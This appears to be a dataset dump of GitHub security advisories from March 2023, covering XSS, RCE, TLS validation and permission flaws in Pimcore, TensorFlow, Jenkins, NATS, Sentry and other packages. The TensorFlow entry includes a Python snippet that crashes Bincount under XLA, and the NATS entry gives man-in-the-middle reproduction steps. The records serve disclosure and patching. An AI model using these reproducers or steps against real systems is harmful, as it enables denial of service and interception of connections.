schema_version
stringclasses 1
value | id
stringlengths 19
19
| modified
stringlengths 20
20
| published
stringlengths 20
20
| withdrawn
stringlengths 20
20
⌀ | aliases
stringlengths 2
20
| summary
stringlengths 20
140
| details
stringlengths 56
37.2k
| severity
stringlengths 2
92
| affected
stringlengths 88
7.07k
| references
stringlengths 139
4.72k
| database_specific
stringlengths 131
185
|
---|---|---|---|---|---|---|---|---|---|---|---|
1.4.0
|
GHSA-8wg7-88cg-7p9j
|
2023-03-30T15:07:28Z
|
2023-03-07T12:30:17Z
|
2023-03-30T14:59:40Z
|
['CVE-2023-1247']
|
Withdrawn Advisory: Pimcore vulnerable to Cross-site Scripting
|
## Withdrawn Advisory
This advisory has been withdrawn because the maintainers no longer consider this to be a security issue. This link is maintained to preserve external references.
## Original Description
Cross-site Scripting (XSS) - Reflected in GitHub repository pimcore/pimcore prior to 11.0.0.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '11.0.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1247'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/da2af2d413b144b9a742118124457d13232d31fd'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/04447124-c7d4-477f-8364-91fe5b59cda0'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-08T17:17:54Z', 'nvd_published_at': '2023-03-07T10:15:00Z'}
|
1.4.0
|
GHSA-7x4v-9gxg-9hwj
|
2023-04-03T20:56:25Z
|
2023-03-24T21:54:18Z
| null |
['CVE-2023-25675']
|
TensorFlow has Segfault in Bincount with XLA
|
### Impact
When running with XLA, `tf.raw_ops.Bincount` segfaults when given a parameter `weights` that is neither the same shape as parameter `arr` nor a length-0 tensor.
```python
import tensorflow as tf
func = tf.raw_ops.Bincount
para={'arr': 6, 'size': 804, 'weights': [52, 351]}
@tf.function(jit_compile=True)
def fuzz_jit():
y = func(**para)
return y
print(fuzz_jit())
```
### Patches
We have patched the issue in GitHub commit [8ae76cf085f4be26295d2ecf2081e759e04b8acf](https://github.com/tensorflow/tensorflow/commit/8ae76cf085f4be26295d2ecf2081e759e04b8acf).
The fix will be included in TensorFlow 2.12. We will also cherrypick this commit on TensorFlow 2.11.1.
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
### Attribution
This vulnerability has been reported by r3pwnx of 360 AIVul Team
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-7x4v-9gxg-9hwj'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25675'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/8ae76cf085f4be26295d2ecf2081e759e04b8acf'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]
|
{'cwe_ids': ['CWE-697'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-24T21:54:18Z', 'nvd_published_at': '2023-03-25T00:15:00Z'}
|
1.4.0
|
GHSA-hf9h-vv4m-2f33
|
2023-05-23T20:37:22Z
|
2023-03-10T21:30:19Z
| null |
['CVE-2023-27899']
|
Incorrect Authorization in Jenkins Core
|
Jenkins creates a temporary file when a plugin is uploaded from an administrator’s computer.
Jenkins 2.393 and earlier, LTS 2.375.3 and earlier, and prior to LTS 2.387.1 creates this temporary file in the system temporary directory with the default permissions for newly created files.
If these permissions are overly permissive, they may allow attackers with access to the Jenkins controller file system to read and write the file before it is installed in Jenkins, potentially resulting in arbitrary code execution.
This vulnerability only affects operating systems using a shared temporary directory for all users (typically Linux). Additionally, the default permissions for newly created files generally only allows attackers to read the temporary file.
Jenkins 2.394, LTS 2.375.4, and LTS 2.387.1 creates the temporary file with more restrictive permissions.
As a workaround, you can set a different path as your default temporary directory using the Java system property java.io.tmpdir, if you’re concerned about this issue but unable to immediately update Jenkins.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.main:jenkins-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.376'}, {'fixed': '2.387.1'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.main:jenkins-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.375.4'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.main:jenkins-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.388'}, {'fixed': '2.394'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-27899'}, {'type': 'WEB', 'url': 'https://github.com/CVEProject/cvelist/blob/master/2023/27xxx/CVE-2023-27899.json'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-03-08/#SECURITY-2823'}]
|
{'cwe_ids': ['CWE-863'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-17T14:45:00Z', 'nvd_published_at': '2023-03-10T21:15:00Z'}
|
1.4.0
|
GHSA-83qr-c7m9-wmgw
|
2023-03-23T19:11:03Z
|
2023-03-21T06:30:17Z
| null |
['CVE-2023-1535']
|
Answer vulnerable to Stored Cross-site Scripting
|
Cross-site Scripting (XSS) - Stored in GitHub repository answerdev/answer prior to 1.0.7.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/answerdev/answer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.7'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1535'}, {'type': 'WEB', 'url': 'https://github.com/answerdev/answer/commit/c3743bad4f2a69f69f8f1e1e5b4b6524fc03da25'}, {'type': 'PACKAGE', 'url': 'https://github.com/answerdev/answer'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/4d4b0caa-6d8c-4574-ae7e-e9ef5e2e1a40'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-21T22:31:54Z', 'nvd_published_at': '2023-03-21T05:15:00Z'}
|
1.4.0
|
GHSA-wvc4-j7g5-4f79
|
2023-03-27T21:12:24Z
|
2023-03-27T21:12:24Z
| null |
[]
|
NATS TLS certificate common name validation bypass
|
The NATS official Rust clients are vulnerable to MitM when using TLS.
A fix for the `nats` crate hasn't been released yet. Since the `nats` crate is going to be deprecated anyway, consider switching to `async-nats` `>= 0.29` which already fixed this vulnerability.
The common name of the server's TLS certificate is validated against the `host`name provided by the server's plaintext `INFO` message during the initial connection setup phase. A MitM proxy can tamper with the `host` field's value by substituting it with the common name of a valid certificate it controls, fooling the client into accepting it.
## Reproduction steps
1. The NATS Rust client tries to establish a new connection
2. The connection is intercepted by a MitM proxy
3. The proxy makes a separate connection to the NATS server
4. The NATS server replies with an `INFO` message
5. The proxy reads the `INFO`, alters the `host` JSON field and passes the tampered `INFO` back to the client
6. The proxy upgrades the client connection to TLS, presenting a certificate issued by a certificate authority present in the client's keychain. In the previous step the `host` was set to the common name of said certificate
7. `rustls` accepts the certificate, having verified that the common name matches the attacker-controlled value it was given
9. The client has been fooled by the MitM proxy into accepting the attacker-controlled certificate
|
[]
|
[{'package': {'ecosystem': 'crates.io', 'name': 'nats'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.9.0'}, {'last_affected': '0.24.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/nats-io/nats.rs/pull/881'}, {'type': 'WEB', 'url': 'https://github.com/nats-io/nats.rs/pull/887'}, {'type': 'PACKAGE', 'url': 'https://github.com/nats-io/nats.rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2023-0029.html'}]
|
{'cwe_ids': ['CWE-347'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-27T21:12:24Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-66cm-c7ch-5j8q
|
2023-03-23T18:23:29Z
|
2023-03-20T17:18:33Z
| null |
['CVE-2023-1515']
|
Pimcore vulnerable to Cross-site Scripting (XSS) in Redirects
|
### Impact
Stored XSS vulnerability at Expiry field in the Redirects module.
This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie or redirect users to other malicious sites.
### Patches
Update to version 10.5.19 or apply this patch manually https://github.com/pimcore/pimcore/pull/14562.patch
### Workarounds
Apply patch manually https://github.com/pimcore/pimcore/pull/14562.patch
### References
https://huntr.dev/bounties/ae0f2ec4-a245-4d0b-9d4d-bd8310dd6282/
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.5.19'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/security/advisories/GHSA-66cm-c7ch-5j8q'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1515'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/pull/14562'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/pull/14562.patch'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/44c6b37aa649a0e3105fa41f3d74a3e511acf964'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/ae0f2ec4-a245-4d0b-9d4d-bd8310dd6282'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/ae0f2ec4-a245-4d0b-9d4d-bd8310dd6282/'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-20T17:18:33Z', 'nvd_published_at': '2023-03-20T15:15:00Z'}
|
1.4.0
|
GHSA-29pr-6jr8-q5jm
|
2023-03-22T21:49:38Z
|
2023-03-21T22:31:19Z
| null |
['CVE-2023-28117']
|
Sentry SDK leaks sensitive session information when `sendDefaultPII` is set to `True`
|
### Impact
When using the [Django integration](https://docs.sentry.io/platforms/python/guides/django/) of the Sentry SDK in a specific configuration it is possible to leak sensitive cookies values, including the session cookie to Sentry. These sensitive cookies could then be used by someone with access to your Sentry issues to impersonate or escalate their privileges within your application.
The below must be true in order for these sensitive values to be leaked:
1. Your Sentry SDK configuration has `sendDefaultPII` set to `True`
2. You are using a custom name for either of the cookies below in your Django settings.
- [`SESSION_COOKIE_NAME`](https://docs.djangoproject.com/en/4.1/ref/settings/#std-setting-SESSION_COOKIE_NAME) or
- [`CSRF_COOKIE_NAME`](https://docs.djangoproject.com/en/4.1/ref/settings/#std-setting-CSRF_COOKIE_NAME) Django settings
3. You are not configured in your organization or project settings to use [our data scrubbing features](https://docs.sentry.io/product/data-management-settings/scrubbing/) to account for the custom cookie names
### Patches
As of version `1.14.0`, the Django integration of the `sentry-sdk` will detect the custom cookie names based on your Django settings and will remove the values from the payload _before_ sending the data to Sentry.
### Workarounds
If you can not update your `sentry-sdk` to a patched version than you can use the SDKs filtering mechanism to remove the cookies from the payload that is sent to Sentry. For error events this can be done with the [before_send](https://docs.sentry.io/platforms/python/configuration/filtering/#using-platformidentifier-namebefore-send-) callback method and for performance related events (transactions) you can use the [before_send_transaction](https://docs.sentry.io/platforms/python/configuration/filtering/#using-platformidentifier-namebefore-send-transaction-) callback method.
If you'd like to handle filtering of these values on the server-side, you can also use our [advanced data scrubbing feature](https://docs.sentry.io/product/data-management-settings/scrubbing/advanced-datascrubbing/) to account for the custom cookie names. Look for the `$http.cookies`, `$http.headers`, `$request.cookies`, or `$request.headers` fields to target with your scrubbing rule.
### References
- [Using Your Tools Against You (Chapter8 Blog Post)](https://medium.com/@tomwolters/using-your-tools-against-you-cea4d2482ebb)
- [Sentry Python SDK Filtering](https://docs.sentry.io/platforms/python/configuration/filtering/)
- [Sentry Data Scrubbing](https://docs.sentry.io/product/data-management-settings/scrubbing/advanced-datascrubbing/)
### Credits
- [Tom Wolters (Chapter8)](https://chapter8.com)
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:N'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'sentry-sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.14.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/getsentry/sentry-python/security/advisories/GHSA-29pr-6jr8-q5jm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28117'}, {'type': 'WEB', 'url': 'https://github.com/getsentry/sentry-python/pull/1842'}, {'type': 'PACKAGE', 'url': 'https://github.com/getsentry/sentry-python'}, {'type': 'WEB', 'url': 'https://github.com/getsentry/sentry-python/releases/tag/1.14.0'}]
|
{'cwe_ids': ['CWE-201', 'CWE-209'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-21T22:31:19Z', 'nvd_published_at': '2023-03-22T20:15:00Z'}
|
1.4.0
|
GHSA-j5w9-hmfh-4cr6
|
2023-03-31T16:06:04Z
|
2023-03-24T21:55:07Z
| null |
['CVE-2023-25671']
|
TensorFlow has segmentation fault in tfg-translate
|
### Impact
Out-of-bounds access due to mismatched integer type sizes in ValueMap::Manager::GetValueOrCreatePlaceholder. Bug with tfg-translate call to InitMlir. The problem happens with generic functions, as it is already handled for non-generic functions. This is because they, unlike non-generic functions, are using the "old importer". A better long-term solution may be to have the "new importer" handle generic functions.
### Patches
We have patched the issue in GitHub
- commit [760322a71ac9033e122ef1f4b1c62813021e5938](https://github.com/tensorflow/tensorflow/commit/760322a71ac9033e122ef1f4b1c62813021e5938).
- commit [2eedc8f676d2c3b8be9492e547b2bc814c10b367](https://github.com/tensorflow/tensorflow/commit/2eedc8f676d2c3b8be9492e547b2bc814c10b367)
The fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow 2.11.1
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
### Attribution
This vulnerability has been reported by r3pwnx
### Affiliation
360 AIVul
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-j5w9-hmfh-4cr6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25671'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/2eedc8f676d2c3b8be9492e547b2bc814c10b367'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/760322a71ac9033e122ef1f4b1c62813021e5938'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]
|
{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-24T21:55:07Z', 'nvd_published_at': '2023-03-25T00:15:00Z'}
|
1.4.0
|
GHSA-584m-7r4m-8j6v
|
2023-05-23T20:14:59Z
|
2023-03-10T21:30:19Z
| null |
['CVE-2023-27903']
|
Incorrect Authorization in Jenkins Core
|
When triggering a build from the Jenkins CLI, Jenkins creates a temporary file on the controller if a file parameter is provided through the CLI’s standard input.
Jenkins 2.393 and earlier, LTS 2.375.3 and earlier, and , and LTS prior to 2.387.1 creates this temporary file in the default temporary directory with the default permissions for newly created files.
If these permissions are overly permissive, they may allow attackers with access to the Jenkins controller file system to read and write the file before it is used in the build.
This vulnerability only affects operating systems using a shared temporary directory for all users (typically Linux). Additionally, the default permissions for newly created files generally only allows attackers to read the temporary file.
Jenkins 2.394, LTS 2.375.4, and LTS 2.387.1 creates the temporary file with more restrictive permissions.
As a workaround, you can set a different path as your default temporary directory using the Java system property java.io.tmpdir, if you’re concerned about this issue but unable to immediately update Jenkins.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.main:jenkins-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.376'}, {'fixed': '2.387.1'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.main:jenkins-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.375.4'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.main:jenkins-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.388'}, {'fixed': '2.394'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-27903'}, {'type': 'WEB', 'url': 'https://github.com/CVEProject/cvelist/blob/master/2023/27xxx/CVE-2023-27903.json'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-03-08/#SECURITY-3058'}]
|
{'cwe_ids': ['CWE-863'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-03-16T16:00:59Z', 'nvd_published_at': '2023-03-10T21:15:00Z'}
|
1.4.0
|
GHSA-f6hc-9g49-xmx7
|
2023-04-04T16:14:37Z
|
2023-03-01T22:36:36Z
| null |
['CVE-2023-24533']
|
nistec has Incorrect Calculation in Multiplication of unreduced P-256 scalars
|
Multiplication of certain unreduced P-256 scalars produce incorrect results. There are no protocols known at this time that can be attacked due to this.
From the fix commit notes:
> Unlike the rest of nistec, the P-256 assembly doesn't use complete addition formulas, meaning that p256PointAdd[Affine]Asm won't return the correct value if the two inputs are equal.
>
> This was (undocumentedly) ignored in the scalar multiplication loops because as long as the input point is not the identity and the scalar is lower than the order of the group, the addition inputs can't be the same.
>
> As part of the math/big rewrite, we went however from always reducing the scalar to only checking its length, under the incorrect assumption that the scalar multiplication loop didn't require reduction.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'filippo.io/nistec'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.2'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24533'}, {'type': 'WEB', 'url': 'https://github.com/FiloSottile/nistec/commit/c58aa1223ccf3943513e1e661cebce95af137244'}, {'type': 'PACKAGE', 'url': 'https://github.com/FiloSottile/nistec'}, {'type': 'WEB', 'url': 'https://go.dev/issue/58647'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2023-1595'}]
|
{'cwe_ids': ['CWE-682'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-01T22:36:36Z', 'nvd_published_at': '2023-03-08T20:15:00Z'}
|
1.4.0
|
GHSA-4wfc-ghv5-2v7j
|
2023-04-06T22:56:38Z
|
2023-03-31T03:30:31Z
| null |
['CVE-2023-1759']
|
phpMyFAQ Stored Cross-site Scripting vulnerability
|
Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.12.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'thorsten/phpmyfaq'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.12'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1759'}, {'type': 'WEB', 'url': 'https://github.com/thorsten/phpmyfaq/commit/ecbd8107fe954b6be95dab315862d1caa0b94efa'}, {'type': 'PACKAGE', 'url': 'https://github.com/thorsten/phpmyfaq'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/e8109aed-d364-4c0c-9545-4de0347b10e1'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-31T22:42:39Z', 'nvd_published_at': '2023-03-31T02:15:00Z'}
|
1.4.0
|
GHSA-gh4g-65f6-84g5
|
2023-03-15T19:17:12Z
|
2023-03-10T12:30:16Z
| null |
['CVE-2023-1312']
|
pimcore is vulnerable to cross-site scripting
|
Cross-site Scripting (XSS) - Reflected in GitHub repository pimcore/pimcore prior to 10.5.19.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.5.19'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1312'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/d35d0712858f24d0ec96ddfd4cbe82ff4b5a5fbb'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/2a64a32d-b1cc-4def-91da-18040d59f356'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-10T21:52:41Z', 'nvd_published_at': '2023-03-10T11:15:00Z'}
|
1.4.0
|
GHSA-w4r7-vm83-q2c7
|
2023-03-13T20:41:00Z
|
2023-03-06T00:30:16Z
| null |
['CVE-2023-22432']
|
Open redirect in web2py
|
Open redirect vulnerability exists in web2py versions prior to 2.23.1. When using the tool, a web2py user may be redirected to an arbitrary website by accessing a specially crafted URL. As a result, the user may become a victim of a phishing attack.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'web2py'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.23.1'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-22432'}, {'type': 'WEB', 'url': 'https://jvn.jp/en/jp/JVN78253670/'}, {'type': 'WEB', 'url': 'http://web2py.com/'}, {'type': 'WEB', 'url': 'http://web2py.com/init/default/download'}]
|
{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-13T20:41:00Z', 'nvd_published_at': '2023-03-06T00:15:00Z'}
|
1.4.0
|
GHSA-h4cc-fxpp-pgw9
|
2023-03-28T18:06:06Z
|
2023-03-23T20:00:08Z
| null |
['CVE-2023-25654']
|
baserCMS File Uploader Remote Code Execution (RCE) vulnerability
|
### Impact
There is a Remote Code Execution (RCE) Vulnerability on the management system of baserCMS.
### Target
baserCMS 4.7.3 and earlier versions
### Patches
Update to the latest version of baserCMS
### Credits
島峰泰平@三井物産セキュアディレクション株式会社
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'baserproject/basercms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.7.5'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/baserproject/basercms/security/advisories/GHSA-h4cc-fxpp-pgw9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25654'}, {'type': 'WEB', 'url': 'https://github.com/baserproject/basercms/commit/002886be0998c74c386e04f0b43688a8a45d7a96'}, {'type': 'WEB', 'url': 'https://github.com/baserproject/basercms/commit/08247f0a633d8e836ce2e5cd2d53aa19901a1359'}, {'type': 'WEB', 'url': 'https://github.com/baserproject/basercms/commit/60f83054d8131b0ace60716cec7e629b5eb3a8f0'}, {'type': 'PACKAGE', 'url': 'https://github.com/baserproject/basercms'}, {'type': 'WEB', 'url': 'https://github.com/baserproject/basercms/releases/tag/basercms-4.7.5'}]
|
{'cwe_ids': ['CWE-434'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-03-23T20:00:08Z', 'nvd_published_at': '2023-03-23T20:15:00Z'}
|
1.4.0
|
GHSA-c737-jhwr-fqxj
|
2023-03-16T21:41:13Z
|
2023-03-12T06:30:21Z
| null |
['CVE-2021-46875']
|
Cross Site Scripting in eZ Platform Ibexa Kernel
|
## Impact
In file upload it is possible by certain means to upload files like .html and .js. These may contain XSS exploits which will be run when links to them are accessed by victims.
Patches
## Patches
The fix consists simply of adding common types of scriptable file types to the configuration of the already existing filetype blacklist feature. See "Patched versions". As such, this can also be done manually, without installing the patched versions. This may be relevant if you are currently running a considerably older version of the kernel package and don't want to upgrade it at this time. Please see the settting "ezsettings.default.io.file_storage.file_type_blacklist" at:
https://github.com/ezsystems/ezplatform-kernel/blob/master/eZ/Bundle/EzPublishCoreBundle/Resources/config/default_settings.yml#L109
Important note
## Important note
You should adapt this setting to your needs. Do not add file types to the blacklist that you actually need to be able to upload. For instance, if you need your editors to be able to upload SVG files, then don't blacklist that. Instead, you could e.g. use an approval workflow for such content.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'ezsystems/ezpublish-kernel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.13.0'}, {'fixed': '6.13.8.2'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'ezsystems/ezpublish-kernel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.5.0'}, {'fixed': '7.5.15.2'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'ezsystems/ezplatform-kernel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2.0'}, {'fixed': '1.2.5.1'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'ezsystems/ezplatform-kernel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.3.0'}, {'fixed': '1.3.1.1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/ezsystems/ezpublish-kernel/security/advisories/GHSA-mrvj-7q4f-5p42'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-46875'}, {'type': 'WEB', 'url': 'https://github.com/ezsystems/ezpublish-kernel/commit/29fecd2afe86f763510f10c02f14962d028f311b'}, {'type': 'PACKAGE', 'url': 'https://github.com/ezsystems/ezpublish-kernel'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-13T20:57:46Z', 'nvd_published_at': '2023-03-12T05:15:00Z'}
|
1.4.0
|
GHSA-3gxf-9r58-2ghg
|
2023-03-24T22:01:35Z
|
2023-03-24T22:01:35Z
| null |
[]
|
`openssl` `X509NameBuilder::build` returned object is not thread safe
|
OpenSSL has a `modified` bit that it can set on on `X509_NAME` objects. If this bit is set then the object is not thread-safe even when it appears the code is not modifying the value.
Thanks to David Benjamin (Google) for reporting this issue.
|
[]
|
[{'package': {'ecosystem': 'crates.io', 'name': 'openssl'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.9.7'}, {'fixed': '0.10.48'}]}]}]
|
